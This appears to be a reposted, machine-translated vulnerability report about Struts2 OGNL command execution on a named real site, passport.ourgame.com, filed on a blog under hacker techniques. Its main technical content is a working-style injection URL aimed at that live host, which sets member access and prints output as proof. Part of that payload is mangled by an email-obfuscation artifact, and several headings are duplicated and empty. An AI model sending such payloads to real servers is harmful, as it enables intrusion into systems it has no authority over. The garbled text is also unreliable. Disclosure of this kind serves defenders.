联众世界重要站点st2命令执行
漏洞标题 联众世界重要站点st2命令执行 相关厂商 联众世界 漏洞作者 Mr .LZH 提交时间 2016-04-27 17:04 公开时间 2016-06-16 23:40 漏洞类型 命令执行 危害…
漏洞标题
联众世界重要站点st2命令执行
相关制造商
联合世界
漏洞作者
LZH先生
提交时间
2016-04-27 17: 04
公共时间
2016-06-16 23: 40
漏洞类型
命令执行
危险等级
高
自我评估等级
20
漏洞状态
制造商已确认
标签标签
漏洞详细信息
http://passport.ourgame.com/ks.do?method: [email protected]/* @ DEFAULT_MEMBER_ACCESS,%23w%3d%23context.get(%23parameters.rpsobj [0]),%23w.getWriter()。println( 123456.123%2b123456.123),%23w.getWriter()。flush(),%23w.getWriter()。close(),1?%23xx:%23request.toString& reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest& rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse
漏洞证明:
修理计划:
版权声明:请注明来源Mr.LZH @乌云
漏洞证明:
修理计划:
版权声明:请注明来源Mr.LZH @乌云
- 发表于 2016-07-17 08:00
- 阅读 ( 696 )
- 分类:黑客技术
